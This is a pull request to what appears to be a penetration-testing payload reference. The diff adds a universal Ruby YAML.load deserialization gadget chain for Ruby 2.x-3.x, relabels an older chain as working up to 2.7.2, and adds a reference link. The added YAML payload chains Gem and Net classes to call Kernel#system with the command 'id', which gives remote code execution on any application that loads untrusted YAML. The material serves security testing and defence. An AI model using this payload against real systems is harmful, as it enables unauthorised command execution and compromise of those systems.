### PR TITLE
Add new ruby yaml gadget chain

### DIFF
--- a/Insecure Deserialization/Ruby.md
+++ b/Insecure Deserialization/Ruby.md
@@ -16,7 +16,7 @@ require "yaml"
 YAML.load(File.read("p.yml"))
 ```
 
-Exploitation code
+Universal gadget for ruby <= 2.7.2:
 ```ruby
 --- !ruby/object:Gem::Requirement
 requirements:
@@ -29,9 +29,34 @@ requirements:
       spec:
 ```
 
+Universal gadget for ruby 2.x - 3.x.
+
+```ruby
+---
+- !ruby/object:Gem::Installer
+    i: x
+- !ruby/object:Gem::SpecFetcher
+    i: y
+- !ruby/object:Gem::Requirement
+  requirements:
+    !ruby/object:Gem::Package::TarReader
+    io: &1 !ruby/object:Net::BufferedIO
+      io: &1 !ruby/object:Gem::Package::TarReader::Entry
+         read: 0
+         header: "abc"
+      debug_output: &1 !ruby/object:Net::WriteAdapter
+         socket: &1 !ruby/object:Gem::RequestSet
+             sets: !ruby/object:Net::WriteAdapter
+                 socket: !ruby/module 'Kernel'
+                 method_id: :system
+             git_set: id
+         method_id: :resolve
+```
+
 
 ## References
 
 - [RUBY 2.X UNIVERSAL RCE DESERIALIZATION GADGET CHAIN - elttam, Luke Jahnke](https://www.elttam.com.au/blog/ruby-deserialization/)
 - [Universal RCE with Ruby YAML.load - @_staaldraad ](https://staaldraad.github.io/post/2019-03-02-universal-rce-ruby-yaml-load/)
 - [Online access to Ruby 2.x Universal RCE Deserialization Gadget Chain - PentesterLab](https://pentesterlab.com/exercises/ruby_ugadget/online)
+- [Universal RCE with Ruby YAML.load (versions > 2.7) - @_staaldraad](https://staaldraad.github.io/post/2021-01-09-universal-rce-ruby-yaml-load-updated/)


### PR DESCRIPTION
Currently listed gadget chain has been patched, however a new one was discovered, as per: https://staaldraad.github.io/post/2021-01-09-universal-rce-ruby-yaml-load-updated/